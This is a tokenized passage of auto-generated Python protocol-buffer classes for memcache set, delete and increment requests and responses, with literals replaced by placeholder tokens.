ProtocolMessage ) : <EOL> STORED = <NUM_LIT:1> <EOL> NOT_STORED = <NUM_LIT:2> <EOL> ERROR = <NUM_LIT:3> <EOL> EXISTS = <NUM_LIT:4> <EOL> _SetStatusCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } <EOL> def SetStatusCode_Name ( cls , x ) : return cls . _SetStatusCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> SetStatusCode_Name = classmethod ( SetStatusCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> self . set_status_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def set_status_size ( self ) : return len ( self . set_status_ ) <EOL> def set_status_list ( self ) : return self . set_status_ <EOL> def set_status ( self , i ) : <EOL> return self . set_status_ [ i ] <EOL> def set_set_status ( self , i , x ) : <EOL> self . set_status_ [ i ] = x <EOL> def add_set_status ( self , x ) : <EOL> self . set_status_ . append ( x ) <EOL> def clear_set_status ( self ) : <EOL> self . set_status_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . set_status_size ( ) ) : self . add_set_status ( x . set_status ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . set_status_ ) != len ( x . set_status_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . set_status_ , x . set_status_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . set_status_ ) <EOL> for i in xrange ( len ( self . set_status_ ) ) : n += self . lengthVarInt64 ( self . set_status_ [ i ] ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . set_status_ ) <EOL> for i in xrange ( len ( self . 
set_status_ ) ) : n += self . lengthVarInt64 ( self . set_status_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_set_status ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . set_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . set_status_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . set_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . set_status_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . add_set_status ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . set_status_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kset_status = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheDeleteRequest_Item ( ProtocolBuffer . 
ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_delete_time_ = <NUM_LIT:0> <EOL> delete_time_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def delete_time ( self ) : return self . delete_time_ <EOL> def set_delete_time ( self , x ) : <EOL> self . has_delete_time_ = <NUM_LIT:1> <EOL> self . delete_time_ = x <EOL> def clear_delete_time ( self ) : <EOL> if self . has_delete_time_ : <EOL> self . has_delete_time_ = <NUM_LIT:0> <EOL> self . delete_time_ = <NUM_LIT:0> <EOL> def has_delete_time ( self ) : return self . has_delete_time_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_delete_time ( ) ) : self . set_delete_time ( x . delete_time ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_delete_time_ != x . has_delete_time_ : return <NUM_LIT:0> <EOL> if self . has_delete_time_ and self . delete_time_ != x . delete_time_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . 
has_delete_time_ ) : n += <NUM_LIT:5> <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_delete_time_ ) : n += <NUM_LIT:5> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_delete_time ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delete_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . delete_time_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delete_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . delete_time_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_delete_time ( d . get32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_delete_time_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . delete_time_ ) ) <EOL> return res <EOL> class MemcacheDeleteRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> self . lazy_init_lock_ = thread . 
allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheDeleteRequest_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . 
item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . 
putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . 
has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemkey = <NUM_LIT:2> <EOL> kItemdelete_time = <NUM_LIT:3> <EOL> kname_space = <NUM_LIT:4> <EOL> koverride = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:key>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheDeleteResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> DELETED = <NUM_LIT:1> <EOL> NOT_FOUND = <NUM_LIT:2> <EOL> _DeleteStatusCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def DeleteStatusCode_Name ( cls , x ) : return cls . _DeleteStatusCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> DeleteStatusCode_Name = classmethod ( DeleteStatusCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> self . 
delete_status_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def delete_status_size ( self ) : return len ( self . delete_status_ ) <EOL> def delete_status_list ( self ) : return self . delete_status_ <EOL> def delete_status ( self , i ) : <EOL> return self . delete_status_ [ i ] <EOL> def set_delete_status ( self , i , x ) : <EOL> self . delete_status_ [ i ] = x <EOL> def add_delete_status ( self , x ) : <EOL> self . delete_status_ . append ( x ) <EOL> def clear_delete_status ( self ) : <EOL> self . delete_status_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . delete_status_size ( ) ) : self . add_delete_status ( x . delete_status ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . delete_status_ ) != len ( x . delete_status_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . delete_status_ , x . delete_status_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . delete_status_ ) <EOL> for i in xrange ( len ( self . delete_status_ ) ) : n += self . lengthVarInt64 ( self . delete_status_ [ i ] ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . delete_status_ ) <EOL> for i in xrange ( len ( self . delete_status_ ) ) : n += self . lengthVarInt64 ( self . delete_status_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_delete_status ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . delete_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . delete_status_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . delete_status_ ) ) : <EOL> out . 
putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . delete_status_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . add_delete_status ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . delete_status_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kdelete_status = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheIncrementRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> INCREMENT = <NUM_LIT:1> <EOL> DECREMENT = <NUM_LIT:2> <EOL> _Direction_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def Direction_Name ( cls , x ) : return cls . _Direction_NAMES . 
get ( x , "<STR_LIT>" ) <EOL> Direction_Name = classmethod ( Direction_Name ) <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_delta_ = <NUM_LIT:0> <EOL> delta_ = <NUM_LIT:1> <EOL> has_direction_ = <NUM_LIT:0> <EOL> direction_ = <NUM_LIT:1> <EOL> has_initial_value_ = <NUM_LIT:0> <EOL> initial_value_ = <NUM_LIT:0> <EOL> has_initial_flags_ = <NUM_LIT:0> <EOL> initial_flags_ = <NUM_LIT:0> <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def delta ( self ) : return self . delta_ <EOL> def set_delta ( self , x ) : <EOL> self . has_delta_ = <NUM_LIT:1> <EOL> self . delta_ = x <EOL> def clear_delta ( self ) : <EOL> if self . has_delta_ : <EOL> self . has_delta_ = <NUM_LIT:0> <EOL> self . delta_ = <NUM_LIT:1> <EOL> def has_delta ( self ) : return self . has_delta_ <EOL> def direction ( self ) : return self . direction_ <EOL> def set_direction ( self , x ) : <EOL> self . has_direction_ = <NUM_LIT:1> <EOL> self . direction_ = x <EOL> def clear_direction ( self ) : <EOL> if self . has_direction_ : <EOL> self . 
has_direction_ = <NUM_LIT:0> <EOL> self . direction_ = <NUM_LIT:1> <EOL> def has_direction ( self ) : return self . has_direction_ <EOL> def initial_value ( self ) : return self . initial_value_ <EOL> def set_initial_value ( self , x ) : <EOL> self . has_initial_value_ = <NUM_LIT:1> <EOL> self . initial_value_ = x <EOL> def clear_initial_value ( self ) : <EOL> if self . has_initial_value_ : <EOL> self . has_initial_value_ = <NUM_LIT:0> <EOL> self . initial_value_ = <NUM_LIT:0> <EOL> def has_initial_value ( self ) : return self . has_initial_value_ <EOL> def initial_flags ( self ) : return self . initial_flags_ <EOL> def set_initial_flags ( self , x ) : <EOL> self . has_initial_flags_ = <NUM_LIT:1> <EOL> self . initial_flags_ = x <EOL> def clear_initial_flags ( self ) : <EOL> if self . has_initial_flags_ : <EOL> self . has_initial_flags_ = <NUM_LIT:0> <EOL> self . initial_flags_ = <NUM_LIT:0> <EOL> def has_initial_flags ( self ) : return self . has_initial_flags_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_delta ( ) ) : self . set_delta ( x . delta ( ) ) <EOL> if ( x . has_direction ( ) ) : self . set_direction ( x . direction ( ) ) <EOL> if ( x . 
has_initial_value ( ) ) : self . set_initial_value ( x . initial_value ( ) ) <EOL> if ( x . has_initial_flags ( ) ) : self . set_initial_flags ( x . initial_flags ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_delta_ != x . has_delta_ : return <NUM_LIT:0> <EOL> if self . has_delta_ and self . delta_ != x . delta_ : return <NUM_LIT:0> <EOL> if self . has_direction_ != x . has_direction_ : return <NUM_LIT:0> <EOL> if self . has_direction_ and self . direction_ != x . direction_ : return <NUM_LIT:0> <EOL> if self . has_initial_value_ != x . has_initial_value_ : return <NUM_LIT:0> <EOL> if self . has_initial_value_ and self . initial_value_ != x . initial_value_ : return <NUM_LIT:0> <EOL> if self . has_initial_flags_ != x . has_initial_flags_ : return <NUM_LIT:0> <EOL> if self . has_initial_flags_ and self . initial_flags_ != x . initial_flags_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . 
key_ ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_delta_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . direction_ ) <EOL> if ( self . has_initial_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_delta_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . direction_ ) <EOL> if ( self . has_initial_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . 